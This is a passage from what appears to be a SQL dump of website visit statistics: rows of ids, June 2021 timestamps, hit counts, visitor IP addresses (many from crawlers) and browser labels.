555645,1623118860,1,1,0,0,'66.249.70.5','chrome'),(555646,1623119056,1,1,0,0,'66.249.70.7','chrome'),(555647,1623120871,1,0,1,0,'66.249.70.9',''),(555648,1623130021,1,0,1,0,'66.249.70.5',''),(555649,1623133108,1,1,0,0,'168.235.197.157','chrome'),(555650,1623133130,1,1,0,0,'37.110.211.188','chrome'),(555651,1623134416,1,1,0,0,'176.118.53.210','chrome'),(555652,1623138355,1,1,0,0,'69.171.249.16','other'),(555653,1623141028,1,0,1,0,'66.249.70.7',''),(555654,1623142284,1,1,0,0,'69.171.249.17','other'),(555655,1623151359,1,1,0,0,'5.255.231.105','other'),(555656,1623155009,1,1,0,0,'34.96.130.20','other'),(555657,1623157575,1,1,0,0,'193.9.115.117','chrome'),(555658,1623158642,1,1,0,0,'5.255.253.87','other'),(555659,1623159781,1,1,0,0,'66.249.70.57','chrome'),(555660,1623160455,1,0,1,0,'66.249.70.55',''),(555661,1623161991,5,5,0,0,'13.58.56.77','chrome'),(555662,1623176155,3,3,0,0,'51.38.42.39','firefox'),(555663,1623179866,1,1,0,0,'66.249.70.59','chrome'),(555664,1623179924,1,1,0,0,'66.249.70.57','chrome'),(555665,1623181673,3,3,0,0,'66.249.70.59','chrome'),(555666,1623181757,2,1,1,0,'66.249.70.55',''),(555667,1623182303,1,1,0,0,'66.249.70.57','chrome'),(555668,1623183856,1,0,1,0,'66.249.70.59',''),(555669,1623185390,1,1,0,0,'213.180.203.181','other'),(555670,1623188756,1,1,0,0,'66.249.70.55','chrome'),(555671,1623191395,1,1,0,0,'66.249.70.59','chrome'),(555672,1623196606,1,0,1,0,'66.249.70.59',''),(555673,1623209920,3,3,0,0,'139.99.45.136','firefox'),(555674,1623217383,2,0,2,0,'66.249.70.55',''),(555675,1623226453,1,1,0,0,'66.249.70.57','chrome'),(555676,1623227480,5,5,0,0,'13.209.28.104','chrome'),(555677,1623228107,1,1,0,0,'213.180.203.39','other'),(555678,1623228167,1,0,1,0,'66.249.70.57',''),(555679,1623229443,1,1,0,0,'5.255.253.87','other'),(555680,1623244337,1,1,0,0,'5.45.207.190','other'),(555681,1623260245,1,0,1,0,'66.249.70.55',''),(555682,1623262269,1,1,0,0,'5.255.253.92','other'),(555683,1623268014,1,1,0,0,'66.249.70.55','chrome'),(555684,1623275093,1,1,0,0,'173.252.111.119','other'),(555685,1623275094,1,1,0,0,'173.252.111.10','other'),(555686,1623286145,2,1,1,0,'66.249.70.55',''),(555687,1623303348,1,0,1,0,'66.249.70.59',''),(555688,1623303350,1,0,1,0,'66.249.70.61',''),(555689,1623304665,1,0,1,0,'66.249.70.57',''),(555690,1623330508,1,1,0,0,'66.249.70.59','chrome'),(555691,1623339869,1,0,1,0,'66.249.70.57',''),(555692,1623345065,1,1,0,0,'45.129.18.65','chrome'),(555693,1623348925,1,1,0,0,'31.13.103.13','other'),(555694,1623348926,1,1,0,0,'31.13.103.18','other'),(555695,1623349344,1,1,0,0,'143.110.147.53','chrome'),(555696,1623350108,1,1,0,0,'173.252.111.15','other'),(555697,1623354675,1,1,0,0,'5.255.253.92','other'),(555698,1623355884,1,1,0,0,'173.252.111.119','other'),(555699,1623377640,1,1,0,0,'109.24.144.155','firefox'),(555700,1623377641,1,1,0,0,'109.24.144.155','firefox'),(555702,1623381546,1,1,0,0,'5.255.253.92','other'),(555703,1623384554,1,1,0,0,'5.255.253.92','other'),(555704,1623389470,1,1,0,0,'31.13.103.118','other'),(555705,1623389875,1,1,0,0,'5.255.253.87','other'),(555706,1623390122,1,0,1,0,'66.249.70.61',''),(555707,1623393605,5,5,0,0,'18.231.94.162','chrome'),(555708,1623402444,1,1,0,0,'77.88.5.42','other'),(555709,1623422575,1,1,0,0,'5.255.253.92','other'),(555710,1623423005,1,1,0,0,'66.249.70.57','chrome'),(555711,1623424777,1,1,0,0,'5.255.253.87','other'),(555712,1623430946,1,1,0,0,'173.252.111.11','other'),(555713,1623432141,1,1,0,0,'5.255.253.92','other'),(555714,1623443368,1,1,0,0,'5.255.253.92','other'),(555715,1623465559,1,1,0,0,'66.249.70.37','chrome'),(555716,1623479528,1,1,0,0,'46.173.175.0','chrome'),(555717,1623485076,1,0,1,0,'66.249.70.41',''),(555718,1623495779,1,1,0,0,'66.249.70.37','chrome'),(555719,1623513878,1,1,0,0,'66.249.70.41','chrome'),(555720,1623514307,1,1,0,0,'185.233.187.118','msie'),(555721,1623514459,1,1,0,0,'46.101.95.65','firefox'),(555722,1623558877,1,1,0,0,'34.86.35.18','other'),(555723,1623562004,1,1,0,0,'5.255.231.19','other'),(555724,1623574404,1,1,0,0,'122.114.76.148','firefox'),(555725,1623574559,5,5,0,0,'18.184.155.204','chrome'),(555726,1623576990,1,0,1,0,'66.249.70.39',''),(555727,1623581421,1,1,0,0,'92.118.160.45','other'),(555728,1623583838,1,1,0,0,'5.255.253.92','other'),(555729,1623585607,1,1,0,0,'5.255.253.92','other'),(555730,1623590983,1,1,0,0,'5.255.253.92','other'),(555731,1623591040,1,1,0,0,'5.255.253.87','other'),(555732,1623591588,1,1,0,0,'185.237.217.11','chrome'),(555733,1623596888,1,1,0,0,'31.13.127.25','other'),(555734,1623618492,1,1,0,0,'5.255.253.92','other'),(555735,1623621475,1,0,1,0,'66.249.70.37',''),(555736,1623631287,1,0,1,0,'66.249.70.37',''),(555737,1623633516,1,0,1,0,'66.249.70.39',''),(555738,1623636452,1,1,0,0,'5.255.253.92','other'),(555739,1623639257,1,1,0,0,'36.99.136.132','chrome'),(555740,1623639348,1,1,0,0,'36.99.136.134','chrome'),(555741,1623652363,1,1,0,0,'31.13.127.23','other'),(555742,1623660743,1,0,1,0,'66.249.70.39',''),(555743,1623664079,1,0,1,0,'66.249.70.39',''),(555744,1623671285,1,1,0,0,'173.252.111.16','other'),(555745,1623675174,1,1,0,0,'37.53.127.17','chrome'),(555746,1623676033,1,1,0,0,'31.13.127.23','other'),(555747,1623677173,1,1,0,0,'5.45.207.150','other'),(555748,1623685112,1,1,0,0,'66.249.70.37','chrome'),(555749,1623685207,1,1,0,0,'31.13.127.20','other'),(555750,1623685717,1,0,1,0,'66.249.70.39',''),(555751,1623686804,1,1,0,0,'213.180.203.111','other'),(555752,1623688147,1,1,0,0,'66.249.70.37','chrome'),(555753,1623690230,1,1,0,0,'92.118.160.61','other'),(555754,1623690336,1,0,1,0,'66.249.70.41',''),(555755,1623691185,1,1,0,0,'66.249.70.39','chrome'),(555756,1623694617,1,0,1,0,'66.249.70.41',''),(555757,1623694686,1,1,0,0,'66.249.70.39','chrome'),(555758,1623699418,1,1,0,0,'91.221.219.15','chrome'),(555759,1623705661,1,1,0,0,'35.173.186.81','chrome'),(555760,1623733015,1,1,0,0,'194.44.122.6','chrome'),(555761,1623733334,1,1,0,0,'35.185.241.102','other'),(555762,1623743828,1,1,0,0,'5.255.253.92','other'),(555763,1623747698,1,1,0,0,'34.77.162.23','other'),(555764,1623756683,1,1,0,0,'173.252.111.116','other'),(555765,1623756684,1,1,0,0,'173.252.111.2','other'),(555766,1623756689,1,1,0,0,'31.13.127.13','other'),(555767,1623756703,1,1,0,0,'173.252.111.24','other'),(555768,1623756704,1,1,0,0,'173.252.111.9','other'),(555769,1623756705,1,1,0,0,'173.252.111.21','other'),(555770,1623756712,1,1,0,0,'173.252.111.6','other'),(555773,1623756713,1,1,0,0,'173.252.111.16','other'),(555774,1623759364,1,1,0,0,'47.242.147.238','chrome'),(555775,1623759368,1,1,0,0,'47.242.147.238','other'),(555776,1623761601,1,1,0,0,'47.243.95.116','chrome'),(555777,1623761605,1,1,0,0,'47.243.95.116','other'),(555778,1623763971,1,1,0,0,'3.82.193.238','firefox'),(555779,1623764409,1,1,0,0,'5.255.253.92','other'),(555780,1623767101,1,1,0,0,'66.249.70.41','chrome'),(555781,1623767558,1,0,1,0,'66.249.70.39',''),(555782,1623770065,1,1,0,0,'5.255.253.92','other'),(555783,1623776988,1,1,0,0,'66.249.70.39','chrome'),(555784,1623779221,1,1,0,0,'139.59.78.248','firefox'),(555785,1623780784,1,1,0,0,'31.13.127.23','other'),(555786,1623782124,1,1,0,0,'161.35.27.209','firefox'),(555787,1623786487,1,1,0,0,'31.13.127.16','other'),(555788,1623786493,1,1,0,0,'185.109.55.179','chrome'),(555789,1623786494,1,1,0,0,'173.252.111.21','other'),(555790,1623798694,2,2,0,0,'54.203.73.198','firefox'),(555791,1623798807,1,1,0,0,'5.255.253.87','other'),(555792,1623813820,1,1,0,0,'209.127.17.242','msie'),(555793,1623815956,1,1,0,0,'5.255.253.87','other'),(555794,1623826745,5,5,0,0,'52.42.79.222','chrome'),(555795,1623846626,1,1,0,0,'88.155.93.57','chrome'),(555796,1623853738,1,0,1,0,'66.249.70.37',''),(555797,1623866903,1,1,0,0,'5.255.253.92','other'),(555798,1623884722,1,1,0,0,'5.45.207.150','other'),(555799,1623887922,1,1,0,0,'5.255.253.92','other'),(555800,1623888132,1,1,0,0,'141.8.142.94','other'),(555801,1623904267,2,2,0,0,'31.13.103.113','other'),(555802,1623904269,2,2,0,0,'31.13.103.120','other'),(555804,1623913700,1,0,1,0,'66.249.70.39',''),(555805,1623916208,1,1,0,0,'5.255.253.92','other'),(555806,1623919024,1,1,0,0,'66.249.70.41','chrome'),(555807,1623920740,1,1,0,0,'5.255.253.87','other'),(555808,1623920941,1,1,0,0,'66.249.70.41','chrome'),(555809,1623923837,1,0,1,0,'66.249.70.39',''),(555810,1623927508,1,1,0,0,'66.249.70.39','chrome'),(555811,1623927853,1,1,0,0,'66.249.70.41','chrome'),(555812,1623929445,1,1,0,0,'66.249.70.39','chrome'),(555813,1623930263,1,0,1,0,'66.249.70.37',''),(555814,1623931036,1,0,1,0,'66.249.70.41',''),(555815,1623932752,1,1,0,0,'66.249.70.37','chrome'),(555816,1623936705,1,1,0,0,'185.112.13.33','chrome'),(555817,1623937492,1,1,0,0,'5.45.207.151','other'),(555818,1623938092,1,1,0,0,'66.249.70.39','chrome'),(555819,1623940059,1,0,1,0,'66.249.70.41',''),(555820,1623940347,1,1,0,0,'5.255.253.92','other'),(555821,1623941327,1,0,1,0,'66.249.70.39',''),(555822,1623941968,1,1,0,0,'66.249.70.37','chrome'),(555823,1623943685,1,1,0,0,'66.249.70.41','chrome'),(555824,1623947267,1,0,1,0,'66.249.70.39',''),(555825,1623948959,1,1,0,0,'31.13.127.9','other'),(555826,1623948981,1,1,0,0,'31.13.127.21','other'),(555827,1623948983,1,1,0,0,'173.252.127.112','other'),(555828,1623949026,1,1,0,0,'173.252.111.22','other'),(555829,1623949045,1,1,0,0,'173.252.111.5','other'),(555830,1623949074,1,1,0,0,'173.252.111.120','other'),(555831,1623949075,1,1,0,0,'173.252.111.8','other'),(555832,1623949104,2,2,0,0,'173.252.111.14','other'),(555833,1623949105,1,1,0,0,'173.252.127.3','other'),(555834,1623949109,1,1,0,0,'31.13.127.28','other'),(555835,1623949144,1,1,0,0,'173.252.111.13','other'),(555836,1623949301,1,1,0,0,'66.249.70.37','chrome'),(555837,1623949999,1,0,1,0,'66.249.70.39',''),(555838,1623950830,1,1,0,0,'173.252.111.119','other'),(555839,1623950940,1,1,0,0,'66.249.70.41','chrome'),(555840,1623951649,1,0,1,0,'66.249.70.39',''),(555841,1623952780,1,0,1,0,'66.249.70.41',''),(555842,1623955759,2,2,0,0,'185.237.217.11','chrome'),(555843,1623956293,1,1,0,0,'173.252.111.1','other'),(555844,1623956294,1,1,0,0,'173.252.111.116','other'),(555846,1623956295,2,2,0,0,'173.252.111.15','other'),(555847,1623956302,1,1,0,0,'173.252.107.10','other'),(555848,1623956303,1,1,0,0,'173.252.111.11','other'),(555851,1623956304,1,1,0,0,'69.171.249.11','other'),(555852,1623956305,1,1,0,0,'173.252.111.10','other'),(555853,1623956307,1,1,0,0,'173.252.111.113','other'),(555854,1623956427,1,1,0,0,'31.13.127.13','other'),(555855,1623956706,1,1,0,0,'173.252.111.19','other'),(555856,1623956707,1,1,0,0,'173.252.111.119','other'),(555859,1623956708,1,1,0,0,'173.252.111.112','other'),(555860,1623956713,1,1,0,0,'69.171.249.9','other'),(555861,1623956714,1,1,0,0,'173.252.87.9','other'),(555862,1623956716,1,1,0,0,'173.252.111.24','other'),(555863,1623956718,1,1,0,0,'173.252.111.117','other'),(555864,1623956743,2,2,0,0,'185.237.217.11','chrome'),(555865,1623957456,1,1,0,0,'69.171.231.120','other'),(555866,1623958085,1,1,0,0,'185.237.217.11','chrome'),(555867,1623958437,1,1,0,0,'173.252.111.16','other'),(555868,1623958438,1,1,0,0,'173.252.111.8','other'),(555870,1623958439,1,1,0,0,'173.252.111.117','other'),(555871,1623958471,1,1,0,0,'173.252.87.22','other'),(555872,1623958529,1,1,0,0,'173.252.111.13','other'),(555873,1623958837,1,1,0,0,'94.153.86.234','chrome'),(555874,1623958977,1,1,0,0,'91.196.178.180','other'),(555875,1623959085,1,1,0,0,'46.133.195.180','chrome'),(555876,1623959124,1,1,0,0,'185.237.217.11','chrome'),(555877,1623959257,1,1,0,0,'173.252.111.111','other'),(555879,1623959258,1,1,0,0,'173.252.111.7','other'),(555881,1623959259,1,1,0,0,'173.252.111.116','other'),(555882,1623959261,1,1,0,0,'46.211.75.117','chrome'),(555883,1623959281,1,1,0,0,'69.171.249.17','other'),(555884,1623959382,1,1,0,0,'173.252.127.34','other'),(555885,1623959584,1,1,0,0,'195.26.18.143','other'),(555886,1623959877,1,0,1,0,'66.249.70.39',''),(555887,1623959917,1,0,1,0,'66.249.70.37',''),(555888,1623960550,1,1,0,0,'31.13.115.6','other'),(555889,1623960843,1,1,0,0,'92.112.242.254','chrome'),(555890,1623960914,1,1,0,0,'185.237.217.11','chrome'),(555891,1623962641,1,1,0,0,'66.249.70.41','chrome'),(555892,1623962742,1,1,0,0,'31.13.127.18','other'),(555893,1623963647,1,1,0,0,'69.171.249.11','other'),(555894,1623963723,1,1,0,0,'173.252.127.10','other'),(555895,1623963949,1,1,0,0,'66.249.70.37','chrome'),(555896,1623964020,1,1,0,0,'185.237.217.11','chrome'),(555897,1623965434,1,1,0,0,'46.211.61.174','chrome'),(555898,1623966377,1,1,0,0,'173.252.127.24','other'),(555899,1623967800,1,1,0,0,'31.13.115.1','other'),(555900,1623967801,1,1,0,0,'31.13.115.3','other'),(555903,1623968144,1,1,0,0,'217.196.161.34','chrome'),(555904,1623968652,1,0,1,0,'66.249.70.37',''),(555905,1623968835,1,1,0,0,'178.133.161.243','chrome'),(555906,1623969241,1,1,0,0,'173.252.87.27','other'),(555907,1623970679,1,1,0,0,'66.249.70.41','chrome'),(555908,1623971743,1,1,0,0,'5.255.253.92','other'),(555909,1623973053,1,1,0,0,'213.180.203.111','other'),(555910,1623973254,1,1,0,0,'5.255.253.92','other'),(555911,1623975329,1,1,0,0,'5.255.253.87','other'),(555912,1623975353,1,1,0,0,'185.138.231.194','other'),(555913,1623975411,1,1,0,0,'173.252.95.21','other'),(555915,1623975412,1,1,0,0,'173.252.95.4','other'),(555920,1623977047,1,0,1,0,'66.249.70.37',''),(555921,1623977634,1,1,0,0,'66.249.70.37','chrome'),(555922,1623978005,1,1,0,0,'173.252.111.12','other'),(555923,1623983249,1,1,0,0,'66.249.70.39','chrome'),(555924,1623986019,1,1,0,0,'45.129.18.23','chrome'),(555925,1623986055,1,1,0,0,'156.146.63.160','chrome'),(555926,1623986920,1,1,0,0,'31.13.103.1','other'),(555927,1623987881,1,1,0,0,'173.252.107.11','other'),(555928,1623987882,1,1,0,0,'173.252.107.9','other'),(555929,1623988151,1,0,1,0,'66.249.70.41',''),(555930,1623989109,1,1,0,0,'66.249.70.41','chrome'),(555931,1623989158,2,2,0,0,'31.13.103.5','other'),(555933,1623989159,1,1,0,0,'31.13.103.119','other'),(555936,1623989277,1,1,0,0,'173.252.83.10','other'),(555937,1623990088,1,1,0,0,'66.249.70.39','chrome'),(555938,1623992370,1,1,0,0,'66.220.149.41','other'),(555939,1623992732,1,1,0,0,'173.252.127.24','other'),(555940,1623993098,5,5,0,0,'13.233.73.212','chrome'),(555941,1623993230,1,1,0,0,'195.64.235.72','chrome'),(555942,1623996536,1,1,0,0,'66.249.70.39','chrome'),(555943,1623997787,1,1,0,0,'94.153.32.122','chrome'),(555944,1623997793,1,1,0,0,'173.252.95.25','other'),(555946,1623997794,1,1,0,0,'173.252.95.30','other'),(555950,1623997795,1,1,0,0,'173.252.95.10','other'),(555951,1623998655,1,1,0,0,'46.211.14.85','chrome'),(555952,1623998856,1,1,0,0,'66.249.70.39','chrome'),(555953,1623999347,1,1,0,0,'173.252.111.15','other'),(555954,1623999505,1,1,0,0,'94.153.2.106','chrome'),(555955,1623999728,1,1,0,0,'46.219.225.9','chrome'),(555956,1624001992,1,1,0,0,'31.13.127.120','other'),(555957,1624002233,1,1,0,0,'31.13.127.1','other'),(555958,1624004024,1,1,0,0,'66.249.70.37','chrome'),(555959,1624004372,1,1,0,0,'173.252.111.15','other'),(555960,1624004413,1,1,0,0,'173.252.111.19','other'),(555961,1624006199,1,1,0,0,'66.249.70.41','chrome'),(555962,1624007395,2,2,0,0,'69.171.249.11','other'),(555963,1624007396,1,1,0,0,'69.171.249.16','other'),(555964,1624007645,1,1,0,0,'173.252.127.9','other'),(555965,1624008990,1,0,1,0,'66.249.70.39',''),(555966,1624009230,1,1,0,0,'46.211.38.42','chrome'),(555967,1624009480,1,1,0,0,'173.252.111.11','other'),(555968,1624009481,1,1,0,0,'173.252.111.22','other'),(555970,1624009482,1,1,0,0,'173.252.111.117','other'),(555972,1624009506,1,1,0,0,'185.237.217.11','chrome'),(555973,1624010244,1,1,0,0,'173.252.95.119','other'),(555974,1624012907,1,1,0,0,'93.170.122.241','chrome'),(555975,1624013131,1,0,1,0,'66.249.70.39',''),(555976,1624013631,1,1,0,0,'23.228.109.147','chrome'),(555977,1624015853,1,1,0,0,'69.171.251.17','other'),(555978,1624016884,1,1,0,0,'69.171.231.113','other'),(555979,1624016885,1,1,0,0,'173.252.127.22','other'),(555981,1624016886,1,1,0,0,'173.252.127.20','other'),(555982,1624016923,5,5,0,0,'34.251.241.226','chrome'),(555983,1624017108,1,0,1,0,'66.249.70.37',''),(555984,1624018977,1,0,1,0,'66.249.70.37',''),(555985,1624019454,1,1,0,0,'31.13.127.11','other'),(555986,1624019455,1,1,0,0,'31.13.127.15','other'),(555989,1624019456,1,1,0,0,'31.13.127.16','other'),(555992,1624020216,1,1,0,0,'185.237.217.11','chrome'),(555993,1624021481,1,1,0,0,'46.211.17.99','chrome'),(555994,1624022503,2,2,0,0,'202.120.234.228','other'),(555995,1624023387,1,1,0,0,'173.252.127.6','other'),(555996,1624023388,1,1,0,0,'173.252.127.20','other'),(555997,1624023389,1,1,0,0,'173.252.127.19','other'),(555998,1624024889,1,0,1,0,'66.249.70.5',''),(555999,1624024890,1,0,1,0,'66.249.70.9',''),(556000,1624025559,1,1,0,0,'173.252.127.23','other'),(556001,1624026221,2,2,0,0,'202.120.234.187','other'),(556002,1624030245,1,1,0,0,'218.64.60.139','other'),(556003,1624030968,1,0,1,0,'66.249.70.37',''),(556004,1624031599,1,1,0,0,'94.153.28.215','chrome'),(556005,1624034885,1,1,0,0,'173.252.83.119','other'),(556006,1624036860,1,1,0,0,'173.252.111.10','other'),(556007,1624036861,1,1,0,0,'173.252.107.12','other'),(556008,1624036862,1,1,0,0,'173.252.107.3','other'),(556009,1624036967,1,1,0,0,'185.237.217.11','chrome'),(556010,1624037706,1,1,0,0,'34.86.35.18','other'),(556011,1624040834,1,0,1,0,'66.249.70.37',''),(556012,1624042570,5,5,0,0,'13.124.222.242','chrome'),(556013,1624043511,1,1,0,0,'66.249.70.39','chrome'),(556014,1624043519,1,1,0,0,'66.220.149.40','other'),(556015,1624045241,1,1,0,0,'91.196.178.219','chrome'),(556016,1624047671,1,1,0,0,'69.171.251.24','other'),(556017,1624048502,1,1,0,0,'66.249.70.39','chrome'),(556018,1624049799,1,1,0,0,'31.0.33.106','chrome'),(556019,1624050168,1,1,0,0,'173.252.111.18','other'),(556020,1624050330,1,1,0,0,'173.252.111.13','other'),(556021,1624050376,1,1,0,0,'173.252.111.119','other'),(556022,1624054698,1,1,0,0,'66.249.70.39','chrome'),(556023,1624057205,1,1,0,0,'66.249.70.41','chrome'),(556024,1624057634,1,1,0,0,'66.249.70.37','chrome'),(556025,1624064920,1,0,1,0,'66.249.70.37',''),(556026,1624074738,1,1,0,0,'31.13.115.14','other'),(556027,1624078521,1,1,0,0,'64.246.161.190','firefox'),(556028,1624085232,1,1,0,0,'5.255.253.92','other'),(556029,1624085364,1,1,0,0,'173.252.83.24','other'),(556030,1624085365,1,1,0,0,'173.252.83.120','other'),(556031,1624087028,1,1,0,0,'173.252.127.7','other'),(556032,1624087553,1,1,0,0,'66.249.70.39','chrome'),(556033,1624087707,1,1,0,0,'66.249.70.37','chrome'),(556034,1624088921,1,0,1,0,'66.249.70.37',''),(556035,1624088987,1,1,0,0,'66.249.70.39','chrome'),(556036,1624090594,1,1,0,0,'66.220.149.34','other'),(556037,1624090715,1,1,0,0,'66.249.70.39','chrome'),(556038,1624090837,1,1,0,0,'5.45.207.190','other'),(556039,1624091149,1,1,0,0,'5.255.253.92','other'),(556040,1624092894,1,1,0,0,'31.13.103.4','other'),(556041,1624092895,2,2,0,0,'31.13.103.7','other'),(556042,1624092896,1,1,0,0,'31.13.103.19','other'),(556046,1624094312,1,1,0,0,'66.249.70.37','chrome'),(556047,1624095195,1,1,0,0,'188.163.29.6','chrome'),(556048,1624096109,1,0,1,0,'66.249.70.41',''),(556049,1624099015,1,1,0,0,'173.252.107.8','other'),(556050,1624104093,1,1,0,0,'23.228.109.147','chrome'),(556051,1624104702,1,1,0,0,'173.252.95.13','other'),(556052,1624104750,1,0,1,0,'66.249.70.37',''),(556053,1624111074,2,2,0,0,'66.249.70.39','chrome'),(556054,1624111296,1,0,1,0,'66.249.70.37',''),(556055,1624112339,1,1,0,0,'49.234.43.244','chrome'),(556056,1624118554,1,1,0,0,'92.118.160.9','other'),(556057,1624119085,1,1,0,0,'66.249.70.37','chrome'),(556058,1624120595,1,1,0,0,'66.249.70.39','chrome'),(556059,1624121857,1,1,0,0,'173.252.127.15','other'),(556060,1624128069,1,0,1,0,'66.249.70.39',''),(556061,1624128293,1,1,0,0,'66.249.70.39','chrome'),(556062,1624128345,5,5,0,0,'34.251.241.226','chrome'),(556063,1624129661,1,0,1,0,'66.249.70.39',''),(556064,1624130905,1,1,0,0,'185.237.217.11','chrome'),(556065,1624131049,1,1,0,0,'173.252.111.9','other'),(556066,1624131050,1,1,0,0,'173.252.111.7','other'),(556068,1624138173,1,1,0,0,'23.228.109.147','chrome'),(556069,1624140124,3,3,0,0,'23.228.109.147','chrome'),(556070,1624142856,1,1,0,0,'66.249.70.37','chrome'),(556071,1624142969,1,1,0,0,'66.249.70.41','chrome'),(556072,1624152464,1,0,1,0,'66.249.70.39',''),(556073,1624159892,1,0,1,0,'66.249.70.37',''),(556074,1624162013,1,1,0,0,'66.249.70.37','chrome'),(556075,1624163862,1,1,0,0,'31.13.127.25','other'),(556076,1624163863,1,1,0,0,'31.13.127.20','other'),(556081,1624165749,1,0,1,0,'66.249.70.37',''),(556082,1624168563,1,1,0,0,'66.249.70.37','chrome'),(556083,1624170505,1,1,0,0,'66.249.70.39','chrome'),(556084,1624171066,1,0,1,0,'66.249.70.37',''),(556085,1624171172,2,0,2,0,'66.249.70.41',''),(556086,1624172564,1,1,0,0,'5.255.231.115','other'),(556087,1624173074,1,1,0,0,'213.180.203.96','other'),(556088,1624173906,1,0,1,0,'66.249.70.37',''),(556089,1624179859,1,1,0,0,'66.220.149.112','other'),(556090,1624181014,1,1,0,0,'66.249.70.41','chrome'),(556091,1624183908,1,1,0,0,'173.252.111.120','other'),(556092,1624183909,1,1,0,0,'173.252.111.10','other'),(556093,1624185582,1,1,0,0,'66.249.70.37','chrome'),(556094,1624186950,1,0,1,0,'66.249.70.41',''),(556095,1624188238,1,1,0,0,'5.255.231.77','other'),(556096,1624188367,1,1,0,0,'66.249.70.41','chrome'),(556097,1624192547,1,1,0,0,'173.252.111.23','other'),(556099,1624193472,1,1,0,0,'5.255.253.87','other'),(556100,1624194091,5,5,0,0,'13.232.96.15','chrome'),(556101,1624197709,1,0,1,0,'66.249.70.41',''),(556102,1624197719,1,0,1,0,'66.249.70.39',''),(556103,1624200323,1,1,0,0,'93.170.136.150','chrome'),(556104,1624200338,2,0,2,0,'66.249.70.39',''),(556105,1624204224,1,1,0,0,'66.249.70.39','chrome'),(556106,1624205586,1,1,0,0,'66.249.70.41','chrome'),(556107,1624208485,1,0,1,0,'66.249.70.37',''),(556108,1624209571,1,0,1,0,'66.249.70.41',''),(556109,1624209623,1,1,0,0,'66.249.70.39','chrome'),(556110,1624209810,1,1,0,0,'5.255.253.92','other'),(556111,1624212201,1,1,0,0,'66.249.70.39','chrome'),(556112,1624212367,1,1,0,0,'165.22.35.21','firefox'),(556113,1624212505,1,1,0,0,'173.252.79.32','other'),(556114,1624215759,1,1,0,0,'31.13.127.11','other'),(556115,1624215760,1,1,0,0,'31.13.127.14','other'),(556116,1624215770,1,1,0,0,'31.13.127.15','other'),(556117,1624215771,1,1,0,0,'31.13.127.24','other'),(556118,1624221320,1,0,1,0,'66.249.70.37',''),(556119,1624221321,1,0,1,0,'66.249.70.41',''),(556120,1624221501,1,1,0,0,'5.255.253.92','other'),(556121,1624225444,1,1,0,0,'5.45.207.150','other'),(556122,1624233641,5,5,0,0,'95.211.172.97','other'),(556123,1624234628,1,1,0,0,'95.211.172.97','other'),(556124,1624244545,38,38,0,0,'185.112.13.4','chrome'),(556125,1624244564,1,1,0,0,'65.21.135.126','chrome'),(556126,1624250967,1,1,0,0,'5.255.253.87','other'),(556127,1624251766,1,1,0,0,'31.13.103.117','other'),(556128,1624253381,1,1,0,0,'66.249.70.41','chrome'),(556129,1624257838,1,0,1,0,'66.249.70.41',''),(556130,1624260003,1,1,0,0,'69.171.249.16','other'),(556131,1624260867,1,0,1,0,'66.249.70.39',''),(556132,1624261242,3,3,0,0,'95.211.172.97','other'),(556133,1624262410,2,2,0,0,'95.211.172.97','other'),(556134,1624263227,1,1,0,0,'173.252.127.5','other'),(556135,1624263248,1,1,0,0,'173.252.127.13','other'),(556136,1624263249,1,1,0,0,'69.171.251.21','other'),(556137,1624263283,1,1,0,0,'31.13.127.14','other'),(556138,1624263327,1,1,0,0,'31.13.127.4','other'),(556139,1624265498,1,1,0,0,'23.228.109.147','chrome'),(556140,1624265895,1,0,1,0,'66.249.70.39',''),(556141,1624268875,1,1,0,0,'79.143.41.214','chrome'),(556142,1624268876,1,1,0,0,'173.252.79.11','other'),(556143,1624268877,1,1,0,0,'173.252.79.7','other'),(556144,1624268878,1,1,0,0,'173.252.79.34','other'),(556148,1624269987,1,1,0,0,'173.252.111.1','other'),(556149,1624273500,1,1,0,0,'193.186.4.57','chrome'),(556150,1624281310,1,1,0,0,'46.211.81.214','chrome'),(556151,1624281945,1,1,0,0,'66.249.70.39','chrome'),(556152,1624289148,1,1,0,0,'66.249.70.37','chrome'),(556153,1624293022,1,1,0,0,'66.249.70.41','chrome'),(556154,1624297820,1,1,0,0,'66.249.70.37','chrome'),(556155,1624304121,1,1,0,0,'196.44.176.55','firefox'),(556156,1624304245,2,2,0,0,'185.237.217.11','chrome'),(556157,1624321135,1,1,0,0,'34.96.130.5','other'),(556158,1624327931,1,1,0,0,'5.45.207.151','other'),(556159,1624344077,1,1,0,0,'66.249.70.37','chrome'),(556160,1624355937,1,1,0,0,'185.237.217.11','chrome'),(556161,1624364230,2,1,1,0,'66.249.70.41',''),(556162,1624369679,2,2,0,0,'185.237.217.11','chrome'),(556163,1624370512,1,0,1,0,'66.249.70.39',''),(556164,1624371984,1,1,0,0,'66.249.70.41','chrome'),(556165,1624380105,1,1,0,0,'66.249.70.41','chrome'),(556166,1624380673,1,1,0,0,'82.145.208.69','chrome'),(556167,1624381747,1,1,0,0,'66.249.70.37','chrome'),(556168,1624382693,1,1,0,0,'66.249.70.41','chrome'),(556169,1624385166,1,1,0,0,'66.249.70.41','chrome'),(556170,1624385418,1,1,0,0,'66.249.70.39','chrome'),(556171,1624387627,2,1,1,0,'66.249.70.37',''),(556172,1624394481,1,0,1,0,'66.249.70.39',''),(556173,1624404163,1,0,1,0,'66.249.70.37',''),(556174,1624414409,1,0,1,0,'66.249.70.41',''),(556175,1624415011,1,0,1,0,'66.249.70.39',''),(556176,1624415475,1,1,0,0,'66.249.70.37','chrome'),(556177,1624416255,1,0,1,0,'66.249.70.39',''),(556178,1624416833,1,0,1,0,'66.249.70.41',''),(556179,1624419688,1,0,1,0,'66.249.70.37',''),(556180,1624419950,1,0,1,0,'66.249.70.39',''),(556181,1624426985,1,0,1,0,'66.249.70.41',''),(556182,1624427115,1,1,0,0,'66.249.70.37','chrome'),(556183,1624430318,1,0,1,0,'66.249.70.39',''),(556184,1624436999,1,1,0,0,'185.237.217.11','chrome'),(556185,1624437411,1,1,0,0,'173.252.111.23','other'),(556187,1624437412,1,1,0,0,'173.252.111.8','other'),(556189,1624437413,1,1,0,0,'173.252.111.16','other'),(556191,1624437416,1,1,0,0,'173.252.111.7','other'),(556192,1624437424,1,1,0,0,'173.252.87.113','other'),(556194,1624437425,1,1,0,0,'173.252.111.118','other'),(556196,1624437489,1,1,0,0,'66.220.149.52','other'),(556197,1624440456,1,1,0,0,'178.133.57.24','chrome'),(556198,1624441747,1,1,0,0,'85.192.11.162','chrome'),(556199,1624442339,1,1,0,0,'69.63.184.2','other'),(556200,1624444817,1,1,0,0,'185.13.106.236','chrome'),(556201,1624445753,1,1,0,0,'46.211.10.197','chrome'),(556202,1624447657,1,1,0,0,'173.252.111.18','other')